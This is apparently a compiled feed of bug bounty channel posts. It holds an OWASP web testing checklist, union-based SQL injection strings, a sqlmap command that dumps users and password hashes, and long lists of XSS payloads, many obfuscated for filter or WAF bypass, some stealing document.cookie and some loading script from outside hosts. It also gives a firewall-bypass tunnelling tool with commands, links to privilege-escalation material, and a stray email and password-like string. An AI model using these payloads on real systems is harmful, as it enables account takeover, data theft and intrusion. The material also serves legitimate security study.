Bug bounty Tips

pollution Test for auto-binding Test for Mass Assignment Test for NULL/Invalid Session Cookie [+] Denial of Service Test for anti-automation Test for account lockout Test for HTTP protocol DoS Test for SQL wildcard DoS [+] Business Logic Test for feature misuse Test for lack of non-repudiation Test for trust relationships Test for integrity of data Test segregation of duties [+] Cryptography Check if data which should be encrypted is not Check for wrong algorithms usage depending on context Check for weak algorithms usage Check for proper use of salting Check for randomness functions [+] Risky Functionality - File Uploads Test that acceptable file types are whitelisted Test that file size limits, upload frequency and total file counts are defined and are enforced Test that file contents match the defined file type Test that all file uploads have Anti-Virus scanning in-place. Test that unsafe filenames are sanitised Test that uploaded files are not directly accessible within the web root Test that uploaded files are not served on the same hostname/port Test that files and other media are integrated with the authentication and authorisation schemas [+] Risky Functionality - Card Payment Test for known vulnerabilities and configuration issues on Web Server and Web Application Test for default or guessable password Test for non-production data in live environment, and vice-versa Test for Injection vulnerabilities Test for Buffer Overflows Test for Insecure Cryptographic Storage Test for Insufficient Transport Layer Protection Test for Improper Error Handling Test for all vulnerabilities with a CVSS v2 score > 4.0 Test for Authentication and Authorization issues Test for CSRF [+] HTML 5 Test Web Messaging Test for Web Storage SQL injection Check CORS implementation Check Offline Web Application

OWASP CHECKLIST [+] Information Gathering Manually explore the site Spider/crawl for missed or hidden content Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store Check the caches of major search engines for publicly accessible sites Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler) Perform Web Application Fingerprinting Identify technologies used Identify user roles Identify application entry points Identify client-side code Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services) Identify co-hosted and related applications Identify all hostnames and ports Identify third-party hosted content [+] Configuration Management Check for commonly used application and administrative URLs Check for old, backup and unreferenced files Check HTTP methods supported and Cross Site Tracing (XST) Test file extensions handling Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS) Test for policies (e.g. Flash, Silverlight, robots) Test for non-production data in live environment, and vice-versa Check for sensitive data in client-side code (e.g. API keys, credentials) [+] Secure Transmission Check SSL Version, Algorithms, Key length Check for Digital Certificate Validity (Duration, Signature and CN) Check credentials only delivered over HTTPS Check that the login form is delivered over HTTPS Check session tokens only delivered over HTTPS Check if HTTP Strict Transport Security (HSTS) in use [+] Authentication Test for user enumeration Test for authentication bypass Test for bruteforce protection Test password quality rules Test remember me functionality Test for autocomplete on password forms/input Test password reset and/or recovery Test password change process Test CAPTCHA Test multi factor authentication Test for logout functionality presence Test for cache management on HTTP (eg Pragma, Expires, Max-age) Test for default logins Test for user-accessible authentication history Test for out-of channel notification of account lockouts and successful password changes Test for consistent authentication across applications with shared authentication schema / SSO [+] Session Management Establish how session management is handled in the application (eg, tokens in cookies, token in URL) Check session tokens for cookie flags (httpOnly and secure) Check session cookie scope (path and domain) Check session cookie duration (expires and max-age) Check session termination after a maximum lifetime Check session termination after relative timeout Check session termination after logout Test to see if users can have multiple simultaneous sessions Test session cookies for randomness Confirm that new session tokens are issued on login, role change and logout Test for consistent session management across applications with shared session management Test for session puzzling Test for CSRF and clickjacking [+] Authorization Test for path traversal Test for bypassing authorization schema Test for vertical Access control problems (a.k.a. Privilege Escalation) Test for horizontal Access control problems (between two users at the same privilege level) Test for missing authorization [+] Data Validation Test for Reflected Cross Site Scripting Test for Stored Cross Site Scripting Test for DOM based Cross Site Scripting Test for Cross Site Flashing Test for HTML Injection Test for SQL Injection Test for LDAP Injection Test for ORM Injection Test for XML Injection Test for XXE Injection Test for SSI Injection Test for XPath Injection Test for XQuery Injection Test for IMAP/SMTP Injection Test for Code Injection Test for Expression Language Injection Test for Command Injection Test for Overflow (Stack, Heap and Integer) Test for Format String Test for incubated vulnerabilities Test for HTTP Splitting/Smuggling Test for HTTP Verb Tampering Test for Open Redirection Test for Local File Inclusion Test for Remote File Inclusion Compare client-side and server-side validation rules Test for NoSQL injection Test for HTTP parameter

[+] Union Based SQL Injection ' or 1=1# 1' ORDER BY 10# 1' UNION SELECT version(),2# 1' UNION SELECT version(),database()# 1' UNION SELECT version(),user()# 1' UNION ALL SELECT table_name,2 from information_schema.tables# 1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"# 1' UNION ALL SELECT concat(user,char(58),password),2 from users# sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> some of the top payloads which are used while practicing oscp

Pentesting Collection Privilege Escalation - Blog: Windows Privilege Escalation (Collection) - Blog: Linux Privilege Escalation (Collection) - Blog: Privilege Escalation via fail2ban - Github: GossiTheDog/SystemNightMare - Github: PEASS-ng - Blogpost: NFS PrivEsc - Blogpost: Bypassing the default UAC manually - Github: CLSIDs for JP - Blogpost: Using PetitPotam to NTLM Relay to Domain Administrator - Paper: Abusing Kerberos: Kerberoasting - Github: Kerberoast - GitHub aclpwn.py - Can be used to perform DCsync attacks and abuse the DACL

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 11 Year old Article

Today, I successfully discovered multiple directory listings. Here’s a quick guide to help you do the same: 1. Select Your Target: Identify the target website you want to test. 2.Use Request Intruder: Utilize tools like Burp Suite's Intruder to automate the process. 3.Set Positions: Configure the positions in your request, e.g., target.com/{wordlist}/. 4.Analyze Responses: Examine the status codes and response lengths to identify valid directories. credit to respected owner.

Just Reported XSS at Hackerone Payload used :

"%5c"><body%2fonload%3d%26lt%3b!--%26gt%3b%26%2310confirm(1)%3bprompt(%2fXSS%2f.source)>"%2c

If you guys okay with it let's make it this week BugBounty program

$23Million Bounty WazirX Hunt Down bounty program https://wazirx.com/blog/wazirx-bounty-program/

🥪Some XSS Payloads 😅 XSS Payloads javascripta:alert(xss)// <details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);"> onpointerenter%3Dconfirm%281%29 <inpuT autofocus oNFocus="setTimeout(function() { /*/top'al'+'\u0065'+'rt'/*/ }, 5000);"></inpuT%3E; jeligob139@darkse.com 2Lc4q9P(Tw6w+6'X,q'cZ36wcAE6WD5M "><img/src/onerror=.1|alert`` Set.constructoralert\x28document.domain\x29`` ";alert('XSS');// alert][0].call(this,1) wp-json/wp/v2/ "><a href=javas&#99;ript:alert(1) <script>onerror=alert;throw'hacked';</script> ''"><script>(1)</script><iFrAme/src=jaVascRipt:prompt.valueOf()(1)+class=shetty></iFramE> javascript:alert(document.cookie) javascript://%0aalert(1) "><script>alert(hello)</script> <scri00pt0>eval[(1)]</sc00rip00t> {{0[a='constructor'][a')()}} {{$eval.constructor('alert(1)')()}} {{$on.constructor('alert(1)')()}} {{].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}} <svg><script%20?>confirm(1) <svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))> <svg%2Fonload%3Deval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ%3D%3D’))> <a href="javascript:alert(1)">Click Here</a> <svg+onload='<script'-alert(1)> <ScRiPt>alert(document.domain)</ScRiPt> <ScRiPt/random>alert(document.domain);</ScRiPt> <src<ScRiPt/random>ipt>alert(document.domain);<src</ScRiPt>ipt> <scr\x00ipt>alert(document.domain)<scr\x00ipt> "><img src=x onerror=alert(document.domain)> "><!--><svg/onload=alert(document.domain)> <iframe%00src="&Tab;javascript:prompt(document.domain)&Tab;%00> <img src=1 onerror=print()> <script>alert(document.domain)</script> "onmousemove=alert("XSS_BY_shetty") " <svg<script> onmou<script>seover</script>="alert('xss')">hii</svg</script>> <svg/onload=window["al"+"ert"]1337> <Img Src=OnXSS OnError=confirm(1337)> <Svg Only=1 OnLoad=confirm(document.domain)> <svg onload=alert&#0000000040document.cookie)> <sVG/oNLY%3d1/*/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b> %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E <Img Src=//X55.is OnLoad%0C=import(Src)> <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> "><IMg%20SrC=x%20onerror=prompt(xss)> <Svg%20On%20Only=1%20Onload=alert(1)>" ">'><details/open/ontoggle=confirm('XSS')> 6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ ';window/*aabb/['al'%2b'ert';// ">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'> <Img Src=//X55.is OnLoad%0C=import(Src)> <sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//</div"> <details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061; alert&#x000000028;origin&#x000029;> 🔗 @bugbounty_tech 🔗

I got sick, I will be back by tomorrow and new BugBounty program is coming tomorrow

Guys 1k followers reached ❤️😍😍 Thanks one and all

Guys, give the target from the three on which we should try it on live today

File-Tunnel Tunnel TCP connections through a file. The program starts a TCP listener, and when a connection is received it writes the TCP data into a file. This same file is read by the counterpart program, which establishes a TCP connection and onforwards the TCP data. To avoid the shared file growing indefinitely, it is purged whenever it gets larger than 10 MB. Example 1 - Bypassing a firewall You'd like to connect from Host A to Host B, but a firewall is in the way. But both hosts have access to a shared folder. Host A:

ft.exe --tcp-listen 127.0.0.1:5000 --write "\\server\share\1.dat" --read "\\server\share\2.dat"

Host B:

ft.exe --read "\\server\share\1.dat" --tcp-connect 127.0.0.1:3389 --write "\\server\share\2.dat"

Now on Host A, configure the client to connect to: 127.0.0.1:5000 Example 2 - Tunnel TCP through RDP (similar to SSH tunnel) You'd like to connect to a remote service (eg. 192.168.1.50:8888), but only have access to Host B using RDP. Host A:

ft.exe --tcp-listen 127.0.0.1:5000 --write "C:\Temp\1.dat" --read "C:\Temp\2.dat"

Run an RDP client and ensure local drives are shared as shown here. Connect to Host B. Host B:

ft.exe --read "\\tsclient\c\Temp\1.dat" --tcp-connect 192.168.1.50:8888 --write "\\tsclient\c\Temp\2.dat"

Now on Host A, you can connect to 127.0.0.1:5000 and it will be forwarded to 192.168.1.50:8888

📚Web Application Penetration testing Study Plan 📝This study plan is based on milestones. So, check how much you can cover and close the checkboxes. The more you close, the better candidate you are for the job role. Also, I assume you have already checked and are comfortable with Common Security Skills study plan. Just to make sure that everyone understands what you need to learn to be a pentester. It is altogether different from bug bounty, Red Team etc. but to excel in any of those roles you should be good at pentesting. It's not necessary that you can be a Red Teamer or Bug bounty hunter if you know pentesting. But a red teamer is surely very good at pentesting. Also, Vulnerability assessment is not pentesting, however, VAPT is a common skills required for pentesters job. 🔗https://github.com/jassics/security-study-plan/blob/main/web-pentest-study-plan.md 🔖#infosec #cybersecurity #hacking #pentesting #security

💉SQL Injection Vulnerability Scanner Tool's 🔹SQLMap – Automatic SQL Injection And Database Takeover Tool 🔗https://github.com/sqlmapproject/sqlmap 🔹jSQL Injection – Java Tool For Automatic SQL Database Injection 🔗https://github.com/ron190/jsql-injection 🔹BBQSQL – A Blind SQL-Injection Exploitation Tool 🔗https://github.com/Neohapsis/bbqsql 🔹NoSQLMap – Automated NoSQL Database Pwnage 🔗 https://github.com/codingo/NoSQLMap 🔹Whitewidow – SQL Vulnerability Scanner 🔗https://www.kitploit.com/2017/05/whitewidow-sql-vulnerability-scanner.html 🔹DSSS – Damn Small SQLi Scanner 🔗https://github.com/stamparm/DSSS 🔹explo – Human And Machine Readable Web Vulnerability Testing Format 🔗https://github.com/dtag-dev-sec/explo 🔹Blind-Sql-Bitshifting – Blind SQL-Injection via Bitshifting 🔗https://github.com/awnumar/blind-sql-bitshifting 🔹Leviathan – Wide Range Mass Audit Toolkit 🔗https://github.com/leviathan-framework/leviathan 🔹Blisqy – Exploit Time-based blind-SQL-injection in HTTP-Headers (MySQL/MariaDB) 🔗https://github.com/JohnTroony/Blisqy 🔖#infosec #cybersecurity #hacking #pentesting #security